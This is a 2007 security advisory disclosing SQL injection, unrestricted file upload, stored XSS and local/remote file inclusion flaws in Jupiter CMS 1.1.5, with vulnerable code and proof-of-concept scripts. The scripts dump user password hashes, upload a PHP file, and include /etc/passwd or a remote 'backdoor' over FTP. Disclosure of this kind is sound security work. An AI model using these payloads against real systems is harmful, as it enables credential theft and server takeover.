12070214.txt
Posted on 15 February 2007
Title: Jupiter CMS 1.1.5 Multiple Vulnerabilities Advisory ID: 12070214 Risk level: High Author: DarkFig <gmdarkfig@gmail.com> URL: http://www.acid-root.new.fr/advisories/12070214.txt .: [ OVERVIEW ] Jupiter CMS 1.1.5 is a powerful user-friendly Community Management System. Advanced boxes/block system, members management, high-end forums, topics, statistics, emoticons/logs management. A new version is actually in coding, however the latest stable version is 1.1.5. I decided to download it because a friend tell me that he was going to use it for his website and he asked me if I could audit it. The first thing I realised is that they directly used the $_SERVER array (without protection against SQL Injection attacks) in several SQL request. The second vulnerability i found, is that the script do not check for file extensions when a user upload an emoticon, and the access protection of the "modules" directory files can be bypassed. There is also a remote/local file inclusion with the "n" parameter, and a permanent XSS. .: [ VULN #1 ] Risk level: Medium Summary: find_ip() SQL Injection Conditions: None The script "includes/functions.php" contains the following functions: function find_ip() { if (getenv('HTTP_CLIENT_IP')) $ip = getenv('HTTP_CLIENT_IP'); elseif (getenv('HTTP_X_FORWARDED_FOR')) $ip = getenv('HTTP_X_FORWARDED_FOR'); elseif (getenv('HTTP_X_FORWARDED')) $ip = getenv('HTTP_X_FORWARDED'); elseif (getenv('HTTP_FORWARDED_FOR')) $ip = getenv('HTTP_FORWARDED_FOR'); elseif (getenv('HTTP_FORWARDED')) $ip = getenv('HTTP_FORWARDED'); else $ip = $_SERVER['REMOTE_ADDR']; return $ip; } This function is called from others PHP scripts in order to determine the IP of the client. But the majority of headers can be modified by the user. For the most part of the time, this function is used in SQL requests. For example, the script "index.php" contains the following SQL request: $ban_ip_check = $db->getLine("SELECT ip, date FROM bans WHERE ip = '".find_ip()."'"); if($ban_ip_check != FALSE) { ?> <link href="templates/<?= $template ?>/extra/jupiter.css" rel="stylesheet" type="tex <div id="attentionwrapper"> <table class="main" height="1%" cellspacing="1" cellpadding="4"><col width="1%"><col <tr height="1%" class="head"><td class="head" colspan="2"><?= $language['Bans name'] <tr height="1%"><td class="con1" rowspan="5" valign="top"><img src="templates/<?= $t <tr height="1%" class="bottom"><td valign="top"><?= $language['Bans title'] ?></td>< <tr height="1%"><td class="con1"><?= $language['Bans desc'] ?> <?= $ban_ip_check['ip <tr height="1%" class="bottom"><td valign="top"><?= $language['Bans title2'] ?></td> </table> </div> <? exit; } magic_quotes_gpc is not applied to $_SERVER array, so this can lead to SQL Injection attack even if magic_quotes_gpc = On. One result of the SQL request is returned to the user, so this is a simple SQL Injection (not a blind). This simple poc illustrate how an attacker can exploit this vulnerability: # SQL Injection Vulnerability (POC #1) # require("phpsploitclass.php"); # See [1] error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $hev = "-1' UNION SELECT CONCAT('" ."[BEGIN_XPL_USER]'," ."(SELECT username FROM users LIMIT 0,1),'" ."[END_XPL_USER]','" ."[BEGIN_XPL_PWD]'," ."(SELECT password FROM users LIMIT 0,1),'" ."[END_XPL_PWD]'),1 #"; $xpl->addheader("Client-IP",$hev); $xpl->get($url); preg_match("#[BEGIN_XPL_USER](.*)[END_XPL_USER]#",$xpl->getcontent(),$usr); preg_match("#[BEGIN_XPL_PWD]([a-z0-9]{32})[END_XPL_PWD]#",$xpl->getcontent(),$pwd); print $usr[1].'::'.$pwd[1]; # # EOF POC #1 .: [ VULN #2 ] Risk level: High Summary: File Upload Vulnerability Conditions: register_globals = On All scripts situated in the "modules" directory can be executed by a guest, for example let's see "modules/emoticons.php" access protection : if(isset($is_guest) || isset($is_user)) { header("location: $PHP_SELF?i=2"); exit; } An attacker can access to this script, simply by sending a GET request which contains the "is_guest" and "is_user" variables. For the most part of the time, this is not critical because the script use several functions stored in other files (not include), this return a Fatal Error. But if the "a" parameter is set to 1 the script "modules/emoticons.php" let us upload a file, before producing a Fatal Error. Let's see the upload protection: $allowed_types = array('image/gif', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png'); if(!in_array($uploaded_file['type'],$allowed_types)){ header("location: $PHP_SELF?n=modules/emoticons&i=30");exit; } So what we have to do to bypass this protection, is just to modify the "Content-Type" header. This poc illustrate how an attacker can upload a malicious php file: # File Upload Vulnerability (POC #2) # require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $arr = array(frmdt_url => $url, "is_guest" => 1, "is_user" => 1, "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>")); $xpl->formdata($arr); $xpl->get($url.'images/emoticons/iamaphpfile.php'); print($xpl->getcontent()); # # EOF POC #2 .: [ VULN #3 ] Risk level: Low Summary: "Logged Guests" XSS Conditions: None The script "index.php" insert (in the database) some informations sent by the web browser. if(!isset($_SESSION['in_site'])) { $db->insertRow("online",array('sid' => ''.$session_id.'', 'type' => 'live','status' => 'guest','user' => NULL,'user_id' => NULL, 'user_authorization' => NULL,'user_email' => NULL,'user_hideemail' => NULL, 'user_flag' => NULL,'user_location' => NULL,'ip' => ''.find_ip().'', 'refer' => ''.$_SERVER['HTTP_REFERER'].'','browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'', 'lang' => ''.$lang.'','date' => ''.time().'')); $db->insertRow("online",array('sid' => ''.$session_id.'','type' => 'log', 'status' => 'guest','user' => NULL,'user_id' => NULL,'user_authorization' => NULL, 'user_email' => NULL,'user_hideemail' => NULL,'user_flag' => NULL,'user_location' => NULL, 'ip' => ''.find_ip().'','refer' => ''.$_SERVER['HTTP_REFERER'].'', 'browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'','lang' => ''.$lang.'', 'date' => ''.time().'')); $_SESSION['in_site'] = 1; } All data inserted in the database are protected against SQL Injection attacks, however they're not protected against XSS. This is a permanent XSS, the malicious code will be executed when the admin will click on "Logged Guest". Proof of concept: # "Logged Guest" XSS Vulnerability (POC #3) # require("phpsploitclass.php"); error_reporting(E_ALL ^ E_NOTICE); $url = 'http://localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent("Mozilla"); $xpl->addheader("Referer", "<script>alert('XSS VULN')</script>"); $xpl->get($url); # # EOF POC #3 .: [ VULN #4 ] Risk level: High Summary: Local/Remote File Inclusion Conditions: LFI: magic_quotes_gpc = Off RFI: PHP >= 5.0.0, allow_url_fopen = On The script "index.php" contains the following code: if(isset($n)) { if(file_exists("$n.php")) { if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error"); else include("$n.php"); } elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error"); } The "n" parameter isn't properly filtered, this can lead to file inclusion. Local file inclusion will work if magic_quotes_gpc=Off, the null byte char x00 is required. Remote file inclusion will work if the server is running on PHP >= 5. In this version, the file_exists() function can be used with some URL wrappers, you can use ftp:// for example. Simple poc: LFI: http://<host><path>/index.php?n=/etc/passwd%00 RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor .: [ LINKS ] [1] PhpSploit Class http://www.acid-root.new.fr/tools/03061230.txt [2] FTP/FTPS with PHP http://www.php.net/manual/en/wrappers.ftp.php [3] Good paper about File Upload Vulnerability http://shsc.info/FileUploadSecurity [4] X-Forwarded-For http://en.wikipedia.org/wiki/X-Forwarded-For [5] AcidRoot http://www.acid-root.new.fr